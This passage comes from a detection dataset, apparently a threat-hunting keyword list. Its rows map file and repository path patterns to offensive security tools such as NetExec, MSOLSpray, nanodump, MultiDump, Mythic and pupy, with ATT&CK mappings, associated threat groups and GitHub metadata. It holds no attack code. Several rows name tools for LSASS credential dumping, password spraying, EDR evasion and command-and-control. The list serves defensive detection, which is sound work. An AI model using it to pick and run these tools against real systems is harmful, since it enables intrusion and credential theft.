TA0008","N/A","N/A","C2","https://github.com/offsecginger/koadic","1","1","N/A","10","10","243","75","2022-01-03T01:07:01Z","2022-01-03T01:05:43Z" "*/msi_search.ps1*",".{0,1000}\/msi_search\.ps1.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*/msi-search.git*",".{0,1000}\/msi\-search\.git.{0,1000}","offensive_tool_keyword","msi-search","This tool simplifies the task for red team 
operators and security teams to identify which MSI files correspond to which software and enables them to download the relevant file to investigate local privilege escalation vulnerabilities through MSI repairs","T1005 ","TA0007 - TA0003","N/A","N/A","Discovery","https://github.com/mandiant/msi-search","1","1","N/A","10","3","232","26","2023-07-20T18:12:49Z","2023-06-29T18:31:56Z" "*/msLDAPDump*",".{0,1000}\/msLDAPDump.{0,1000}","offensive_tool_keyword","msldapdump","LDAP enumeration tool implemented in Python3","T1018 - T1210.001","TA0007 - TA0001","N/A","N/A","Reconnaissance","https://github.com/dievus/msLDAPDump","1","1","N/A","N/A","3","215","29","2023-08-14T13:15:29Z","2022-12-30T23:35:40Z" "*/msol.py*",".{0,1000}\/msol\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/MSOLSpray*",".{0,1000}\/MSOLSpray.{0,1000}","offensive_tool_keyword","MSOLSpray","This module will perform password spraying against Microsoft Online accounts (Azure/O365)","T1110.003 - T1553.003","TA0001 - TA0006","N/A","N/A","Network Exploitation tools","https://github.com/dafthack/MSOLSpray","1","1","N/A","10","9","827","159","2024-03-19T11:03:06Z","2020-03-16T13:38:22Z" "*/msrpc-enum.nse*",".{0,1000}\/msrpc\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mssql_priv.py*",".{0,1000}\/mssql_priv\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" "*/ms-sql-brute.nse*",".{0,1000}\/ms\-sql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-config.nse*",".{0,1000}\/ms\-sql\-config\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dac.nse*",".{0,1000}\/ms\-sql\-dac\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-dump-hashes.nse*",".{0,1000}\/ms\-sql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-empty-password.nse*",".{0,1000}\/ms\-sql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mssqlexec.py*",".{0,1000}\/mssqlexec\.py.{0,1000}","offensive_tool_keyword","crackmapexec","protocol scripts from crackmapexec. CrackMapExec or CME is a post-exploitation tool developed in Python and designed for penetration testing against networks. 
CrackMapExec collects Active Directory information to conduct Lateral Movement through targeted networks","T1087.002 - T1110 - T1110.001 - T1110.003 - T1059.001 - T1083 - T1112 - T1135 - T1003.002 - T1003.003 - T1003.004 - T1201 - T1069.002 - T1018 - T1053.002 - T1082 - T1016 - T1049 - T1550.002","TA0002 - TA0006 - TA0007","N/A","APT39 - Dragonfly - FIN7 - MuddyWater","POST Exploitation tools","https://github.com/Porchetta-Industries/CrackMapExec","1","1","N/A","N/A","10","8133","1633","2023-12-06T17:09:42Z","2015-08-14T14:11:55Z" "*/ms-sql-hasdbaccess.nse*",".{0,1000}\/ms\-sql\-hasdbaccess\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-info.nse*",".{0,1000}\/ms\-sql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-ntlm-info.nse*",".{0,1000}\/ms\-sql\-ntlm\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mssqlproxy.git*",".{0,1000}\/mssqlproxy\.git.{0,1000}","offensive_tool_keyword","mssqlproxy","mssqlproxy is a toolkit aimed to perform Lateral Movement in restricted environments through a compromised Microsoft SQL Server via socket reuse","T1021.002 - T1071.001 - T1573.002","TA0008 - TA0011","N/A","N/A","Lateral Movement - Sniffing & Spoofing","https://github.com/blackarrowsec/mssqlproxy","1","1","N/A","10","8","704","113","2021-02-16T20:13:04Z","2020-02-12T08:44:28Z" "*/ms-sql-query.nse*",".{0,1000}\/ms\-sql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-tables.nse*",".{0,1000}\/ms\-sql\-tables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/ms-sql-xp-cmdshell.nse*",".{0,1000}\/ms\-sql\-xp\-cmdshell\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mtrace.nse*",".{0,1000}\/mtrace\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mtth-bfft/adeleg/releases*",".{0,1000}\/mtth\-bfft\/adeleg\/releases.{0,1000}","offensive_tool_keyword","Adeleginator","tool that uses ADeleg to find insecure trustee and resource delegations in Active Directory","T1087 - T1136 - T1069","TA0007 - TA0003 - TA0004","N/A","N/A","Discovery","https://github.com/techspence/Adeleginator","1","1","N/A","6","1","65","6","2024-04-30T20:17:27Z","2024-03-04T03:44:52Z" "*/MultiDump.exe*",".{0,1000}\/MultiDump\.exe.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" "*/MultiDump.git*",".{0,1000}\/MultiDump\.git.{0,1000}","offensive_tool_keyword","MultiDump","MultiDump is a post-exploitation tool for dumping and extracting LSASS memory discreetly","T1003 - T1564.002","TA0005 - TA0006","N/A","N/A","Credential Access","https://github.com/Xre0uS/MultiDump","1","1","N/A","10","5","401","49","2024-04-17T08:06:17Z","2024-02-02T05:56:29Z" 
"*/MultiPotato.git*",".{0,1000}\/MultiPotato\.git.{0,1000}","offensive_tool_keyword","MultiPotato","get SYSTEM via SeImpersonate privileges","T1548.002 - T1134.002","TA0004 - TA0006","N/A","N/A","Privilege Escalation","https://github.com/S3cur3Th1sSh1t/MultiPotato","1","1","N/A","10","5","497","89","2021-11-20T16:20:23Z","2021-11-19T15:50:55Z" "*/multi-user.target.wants/tor.service*",".{0,1000}\/multi\-user\.target\.wants\/tor\.service.{0,1000}","offensive_tool_keyword","tor","used for anonymous communication and web browsing. It is designed to protect users' privacy and freedom by preventing surveillance or traffic analysis. Abused by attacker for defense evasion, contacting C2 and data exfiltration","T1573.002 - T1090.003","TA0011 - TA0010 - TA0005","CostaRicto - Operation Wocao","APT28 - APT29 - Leviathan","C2","https://deb.torproject.org/torproject.org/","1","0","N/A","10","10","N/A","N/A","N/A","N/A" "*/murmur-version.nse*",".{0,1000}\/murmur\-version\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mushishi.h*",".{0,1000}\/mushishi\.h.{0,1000}","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. 
By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","32831","13685","2024-05-01T19:17:03Z","2011-08-30T06:13:20Z" "*/MutationGate.git*",".{0,1000}\/MutationGate\.git.{0,1000}","offensive_tool_keyword","MutationGate","MutationGate is a new approach to bypass EDR's inline hooking by utilizing hardware breakpoint to redirect the syscall.","T1055.011 - T1564.008 - T1557","TA0005 - TA0042","N/A","N/A","Defense Evasion","https://github.com/senzee1984/MutationGate","1","1","N/A","8","2","195","29","2024-04-10T03:12:58Z","2024-01-15T04:29:37Z" "*/mysql-audit.nse*",".{0,1000}\/mysql\-audit\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-brute.nse*",".{0,1000}\/mysql\-brute\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-databases.nse*",".{0,1000}\/mysql\-databases\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-dump-hashes.nse*",".{0,1000}\/mysql\-dump\-hashes\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-empty-password.nse*",".{0,1000}\/mysql\-empty\-password\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-enum.nse*",".{0,1000}\/mysql\-enum\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-info.nse*",".{0,1000}\/mysql\-info\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-query.nse*",".{0,1000}\/mysql\-query\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-users.nse*",".{0,1000}\/mysql\-users\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-variables.nse*",".{0,1000}\/mysql\-variables\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/mysql-vuln-cve2012-2122.nse*",".{0,1000}\/mysql\-vuln\-cve2012\-2122\.nse.{0,1000}","offensive_tool_keyword","nmap","Nmap NSE Scripts. 
Nmap Network Mapper is a free and open source utility for network discovery and security auditing","T1595 - T1592 - T1589 - T1590 - T1591 - T1190 - T1059 - T1046 - T1016 - T1049 - T1007","TA0001 - TA0002 - TA0003 - TA0006","N/A","N/A","Exploitation tools","https://svn.nmap.org/nmap/scripts/","1","1","N/A","N/A","N/A","N/A","N/A","N/A","N/A" "*/Mystikal.git*",".{0,1000}\/Mystikal\.git.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/mystikal.py*",".{0,1000}\/mystikal\.py.{0,1000}","offensive_tool_keyword","Mystikal","macOS Initial Access Payload Generator","T1059.005 - T1204.002 - T1566.001","TA0002 - TA0001","N/A","N/A","Exploitation tools","https://github.com/D00MFist/Mystikal","1","1","N/A","9","3","268","38","2024-01-10T15:48:12Z","2021-05-03T14:46:16Z" "*/Mythic/mythic*",".{0,1000}\/Mythic\/mythic.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/Mythic_CLI*",".{0,1000}\/Mythic_CLI.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" 
"*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/MythicAgents/*",".{0,1000}\/MythicAgents\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/MythicC2Profiles/*",".{0,1000}\/MythicC2Profiles\/.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/mythic-cli*",".{0,1000}\/mythic\-cli.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" 
"*/MythicConfig.cs*",".{0,1000}\/MythicConfig\.cs.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/mythic-react-docker*",".{0,1000}\/mythic\-react\-docker.{0,1000}","offensive_tool_keyword","mythic","A collaborative multi-platform red teaming framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1059-004 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001 - T1569-002","TA0002 - TA0003","N/A","N/A","C2","https://github.com/its-a-feature/Mythic","1","1","N/A","10","10","2895","405","2024-04-23T14:28:51Z","2018-07-05T02:09:59Z" "*/mzet-/les-res*",".{0,1000}\/mzet\-\/les\-res.{0,1000}","offensive_tool_keyword","linux-exploit-suggester","Linux privilege escalation auditing tool","T1078 - T1068 - T1055","TA0004 - TA0003","N/A","N/A","Privilege Escalation","https://github.com/The-Z-Labs/linux-exploit-suggester","1","0","N/A","10","10","5246","1068","2024-02-17T11:44:50Z","2016-10-06T21:55:51Z" "*/n1nj4sec/pupy*",".{0,1000}\/n1nj4sec\/pupy.{0,1000}","offensive_tool_keyword","pupy","Pupy is an opensource. cross-platform (Windows. Linux. OSX. 
Android) C2 and post-exploitation framework written in python and C","T1024 - T1033 - T1036 - T1055 - T1056 - T1064 - T1064.001 - T1071 - T1071.001 - T1071.002 - T1071.004 - T1071.005 - T1071.006 - T1071.007 - T1071.008 - T1071.009 - T1071.010 - T1071.012 - T1071.013 - T1071.014 - T1071.015 - T1071.016 - T1071.018 - T1086 - T1091 - T1098 - T1102 - T1105 - T1105.002 - T1113 - T1123 - T1134 - T1203 - T1573 - T1573.002 - T1573.003 - T1573.004 - T1573.005","TA0002 - TA0003 - TA0004","N/A","N/A","C2","https://github.com/n1nj4sec/pupy","1","1","N/A","10","10","8130","1799","2024-03-22T08:52:53Z","2015-09-21T17:30:53Z" "*/nanodump*",".{0,1000}\/nanodump.{0,1000}","offensive_tool_keyword","nanodump","The swiss army knife of LSASS dumping. A flexible tool that creates a minidump of the LSASS process.","T1003.001 - T1003.003","TA0006","N/A","N/A","Credential Access","https://github.com/fortra/nanodump","1","1","N/A","N/A","10","1631","226","2024-04-30T18:40:32Z","2021-11-10T18:28:15Z" "*/nanodump.*",".{0,1000}\/nanodump\..{0,1000}","offensive_tool_keyword","havoc","Havoc is a modern and malleable post-exploitation command and control framework","T1573-001 - T1573-002 - T1573-003 - T1573-004 - T1573-005 - T1059-001 - T1059-003 - T1027 - T1071-001 - T1003 - T1055 - T1036 - T1105 - T1218 - T1057 - T1574-001","TA0002 - TA0003","N/A","N/A","C2","https://github.com/HavocFramework/Havoc","1","1","N/A","10","10","6040","878","2024-04-29T18:46:44Z","2022-09-11T13:21:16Z" "*/nanodump.py*",".{0,1000}\/nanodump\.py.{0,1000}","offensive_tool_keyword","NetExec","NetExec (a.k.a nxc) is a post-exploitation tool that helps automate assessing the security of large Active Directory networks.","T1069 - T1021 - T1136 - T1018","TA0007 - TA0003 - TA0002 - TA0001","N/A","N/A","Credential Access","https://github.com/Pennyw0rth/NetExec","1","1","N/A","10","10","2118","215","2024-05-01T19:24:43Z","2023-09-08T15:36:00Z" 
"*/nanorobeus.git*",".{0,1000}\/nanorobeus\.git.{0,1000}","offensive_tool_keyword","nanorobeus","COFF file (BOF) for managing Kerberos tickets.","T1558.003 - T1208","TA0006 - TA0007","N/A","N/A","C2","https://github.com/wavvs/nanorobeus","1","1","N/A","10","10","273","31","2023-07-02T12:56:27Z","2022-07-04T00:33:30Z" "*/nanorubeus/*",".{0,1000}\/nanorubeus\/.{0,1000}","offensive_tool_keyword","mythic","Athena is a fully-featured cross-platform agent designed using the .NET 6. Athena is designed for Mythic 2.2 and newer","T1021 - T1021.002 - T1024 - T1027 - T1032 - T1059 - T1070 - T1071 - T1086 - T1105 - T1106 - T1107 - T1112 - T1204 - T1566","TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0008","N/A","N/A","C2","https://github.com/MythicAgents/Athena","1","1","N/A","10","10","166","35","2024-04-25T14:30:04Z","2022-01-24T20:44:38Z" "*/Native/SigFlip/*",".{0,1000}\/Native\/SigFlip\/.{0,1000}","offensive_tool_keyword","cobaltstrike","SigFlip is a tool for patching authenticode signed PE files (exe. dll. 
sys ..etc) without invalidating or breaking the existing signature.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/med0x2e/SigFlip","1","1","N/A","10","10","948","175","2023-08-27T18:27:50Z","2021-08-08T15:59:19Z" "*/NativeDump.exe*",".{0,1000}\/NativeDump\.exe.{0,1000}","offensive_tool_keyword","NativeDump","Dump lsass using only Native APIs by hand-crafting Minidump files (without MinidumpWriteDump!)","T1003.001","TA0006","N/A","N/A","Credential 